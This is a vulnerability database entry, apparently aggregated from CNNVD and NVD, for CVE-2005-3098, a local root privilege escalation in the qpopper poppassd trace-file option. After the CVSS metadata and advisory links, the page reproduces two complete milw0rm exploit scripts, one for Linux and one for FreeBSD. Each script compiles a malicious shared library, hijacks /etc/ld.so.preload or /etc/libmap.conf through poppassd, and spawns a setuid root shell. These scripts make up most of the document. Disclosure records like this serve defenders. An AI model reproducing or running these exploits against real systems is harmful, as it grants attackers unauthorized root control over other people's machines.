CVE-2005-3098
CVSS: 4.6
Published: 2005-09-28 19:03:00
Revised: 2011-03-07 21:25:48

[Original] poppassd in Qualcomm qpopper 4.0.8 allows local users to modify arbitrary files and gain privileges via the -t (trace file) command line argument.


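[CNNVD] Qualcomm qpopper local arbitrary file modification and privilege escalation vulnerability (CNNVD-200509-292)

        QPopper is a free, open-source POP3 server developed and maintained by Qualcomm that runs on a variety of Linux and Unix operating systems.
        The poppassd protocol in Qualcomm qpopper 4.0.8 has a security vulnerability: local users can modify arbitrary files or gain privileges via the -t (trace file) command line argument.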

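- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]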

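- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3098
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3098
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-292
(official data source) CNNVD

- Other links and resources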

http://www.vupen.com/english/advisories/2005/1844
(UNKNOWN)  VUPEN  ADV-2005-1844
http://www.securityfocus.com/bid/14944
(UNKNOWN)  BID  14944
http://secunia.com/advisories/16935
(VENDOR_ADVISORY)  SECUNIA  16935
http://seclists.org/lists/fulldisclosure/2005/Sep/0652.html
(VENDOR_ADVISORY)  FULLDISC  20050924 It's time for some warez - Qpopper poppassd local r00t exploit

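- Vulnerability information

Qualcomm qpopper local arbitrary file modification and privilege escalation vulnerability
Medium severity; design error
2005-09-28 00:00:00 2005-10-20 00:00:00
Local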

- Advisories and patches

        No data available

- Vulnerability information (1229)

Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux) (EDBID:1229)
linux local
2005-09-24 Verified
0 Kingcope
#!/bin/sh
# tested and working /str0ke
###########################################################################
# Linux Qpopper poppassd latest version local r00t exploit by kcope     ###
# August 2005                                                           ###
# Confidential - Keep Private!                                          ###
###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd

echo ""
echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/ld.so.preload ]; then
echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"
exit
fi
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 if (!geteuid()) {
 setgid(0);
 setuid(0);
 remove("/etc/ld.so.preload");
 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
 }
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       unlink("/tmp/suid");
       execl("/bin/sh","sh",0); }
_EOF

gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -t /etc/ld.so.preload
echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload
su
if [ -f /tmp/suid ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/suid
else
echo "Sorry, exploit failed."
fi

# milw0rm.com [2005-09-24]
		

- Vulnerability information (1230)

Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd) (EDBID:1230)
bsd local
2005-09-24 Verified
0 Kingcope
#!/bin/sh
###########################################################################
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
# tested on FreeBSD 5.4-RELEASE                                         ###
###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd
HOOKLIB=libutil.so.4

echo ""
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/libmap.conf ]; then
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
exit
fi
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 if (!geteuid()) {
 remove("/etc/libmap.conf");
 execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
 }
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -t /etc/libmap.conf
echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
su
if [ -f /tmp/xxxx ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/xxxx
else
echo "Sorry, exploit failed."
fi

# milw0rm.com [2005-09-24]
		

- Vulnerability information

19683
Qpopper poppassd Trace File Creation Local Privilege Escalation
Local Access Required
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-09-24 Unknown
2005-09-24 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete